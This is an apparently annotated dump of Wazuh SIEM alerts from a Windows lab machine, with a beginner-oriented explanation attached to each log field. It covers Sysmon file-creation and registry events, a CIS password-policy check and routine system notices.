agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.620707 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5524130Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228128 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.551
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\manifest.json
CreationUtcTime: 2025-04-20 01:42:01.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\manifest.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.623580 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5530634Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228129 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.551
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\sets.json
CreationUtcTime: 2025-04-20 01:42:01.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\sets.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.626437 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5553469Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228131 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.553
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\_metadata\verified_contents.json
CreationUtcTime: 2025-04-20 01:42:01.553
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\_metadata\\verified_contents.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534071.629391 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26003 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Minimum password length' is set to '14 or more character(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534073.635871 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:10.0067341Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228512 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:42:10.004
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B5C681E4-1680-4090-A10F-6F4486F58558}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\135.0.3179.85\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:10.004 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: The VSS service is shutting down due to idle timeout. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60702 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534080.640385 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: VSS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8224 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:29.5025140Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2399 Incremental log record number – handy for timeline order.
data.win.system.processID: 12680 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The VSS service is shutting down due to idle timeout. " No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.binary: 2D20436F64653A2020434F525356434330303030303737322D2043616C6C3A2020434F525356434330303030303735342D205049443A202030303031323638302D205449443A202030303030333530342D20434D443A2020433A5C57494E444F57535C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.643528 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0312732Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260578 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.030
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsCore.dll
CreationUtcTime: 2025-04-20 01:55:28.030
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.030 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
